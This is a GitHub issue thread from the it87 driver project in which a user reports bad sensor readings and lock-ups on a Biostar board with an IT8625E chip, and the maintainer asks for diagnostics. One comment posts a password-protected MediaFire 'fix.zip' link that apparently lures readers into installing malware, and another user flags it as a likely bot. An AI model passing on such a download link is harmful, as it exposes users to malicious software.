frankcrawford/it87 #32: Issues with sensor reporting on IT8625E

jrfbal, 2024-08-26:
Hello,
I have a Biostar B760M-SILVER motherboard and it is running Unraid.
According to sensors-detect, it has a Chip `ITE IT8625E Super IO Sensors'

I've installed the ITE IT87 Driver kit and it triggers weird behaviours:
- The motherboard temperature sensor occasionally starts sending wrong data (-30C)
- The fans sensor show the speed correctly, but sometimes send impossible values (70000rpm)
- The CPU fan sometimes stop spinning and being managed by the motherboard
- Occasional system lock-ups

This wrong reports do not show on the Bios or if the driver is not installed.

Currently due to the instability I have removed the drivers, but I can reinstall them for troubleshooting reasons.

Thank you

lyscop, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

ich777, 2024-08-26:
@jrfbal please be aware to not download random things from mediafire that someone posted... I assume this is a bot or hijacked account.

frankcrawford, 2024-08-29:
@jrfbal first off, can you send me what is reported by `cat /sys/class/dmi/id/board_vendor` and `cat /sys/class/dmi/id/board_name`

Then run `sensors-detect` and see what it reports as the chip IDs (note this may say they are not supported as it doesn't know all the chips available in the IT87 module).

jrfbal, 2024-08-29:
Hello,
Sure:
root@Unraid:~# cat /sys/class/dmi/id/board_vendor
BIOSTAR Group
root@Unraid:~# cat /sys/class/dmi/id/board_name
B760M-SILVER

`sensors-detect` returns only the following sensors:

Intel digital thermal sensor...                             Success!
    (driver 'coretemp')
Found 'ITE IT8625E Super IO Sensors'                        Success!
    (address 0xa20, driver 'to-be-written')

At the moment I don't have the drivers installed due to the instability I've reported. It is currently with 3 days of uptime without any crashing or wrong temperature readings.

Thank you

jrfbal, 2024-09-16:
Hello, @frankcrawford,
Is there anything else you need on my end?
Thank you

frankcrawford, 2024-09-18:
@jrfbal  sorry, been busy with some other things.  Much of the issue is that most of the development is done on Gigabyte boards, so it isn't clear exactly how BIOSTAR Group have wired it up.

That will take some digging, and right now I don't have a lot of time to do it.

If you can find a bit more about BIOSTAR and any low-level documentation they may have for their boards it would help.

Thanks
Frank

frankcrawford, 2025-03-23:
@jrfbal any luck finding out more?

jrfbal, 2025-05-09:
Hello @frankcrawford 

I couldn't find anything so I just left the fans at a constant speed.

Thank you for the follow-up.